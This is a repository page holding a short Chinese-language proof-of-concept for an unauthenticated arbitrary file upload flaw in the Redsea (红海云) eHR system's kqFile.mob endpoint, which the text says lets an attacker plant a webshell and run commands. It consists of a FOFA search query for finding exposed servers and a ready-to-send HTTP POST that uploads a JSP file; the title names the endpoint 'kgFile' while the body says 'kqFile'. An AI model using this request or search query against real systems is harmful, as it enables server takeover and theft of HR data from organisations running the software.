admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
POC00/红海云eHR系统kgFile.mob存在任意文件上传漏洞.md
wy876 1ff8a0f815 727更新漏洞
2024-07-27 12:13:07 +08:00

29 lines
757 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 红海云eHR系统kgFile.mob存在任意文件上传漏洞
红海云EHR系统kqFile.mob接口处存在未授权文件上传漏洞攻击者可上传webshell来命令执行获取服务器权限。
## fofa
```yaml
body="/RedseaPlatform/skins/images/favicon.ico"
```
## poc
```yaml
POST /RedseaPlatform/kqFile.mob?method=uploadFile&fileName=fbjgrohu.jsp HTTP/1.1
Host:
User-Agent: Go-http-client/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeaaGwoqCxccjHcca
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Length: 183
------WebKitFormBoundaryeaaGwoqCxccjHcca
Content-Disposition: form-data; name="fj_file"; filename="fbjgrohu.jpg"
<% out.println(111*111); %>
------WebKitFormBoundaryeaaGwoqCxccjHcca--
```
Reference in New Issue View Git Blame Copy Permalink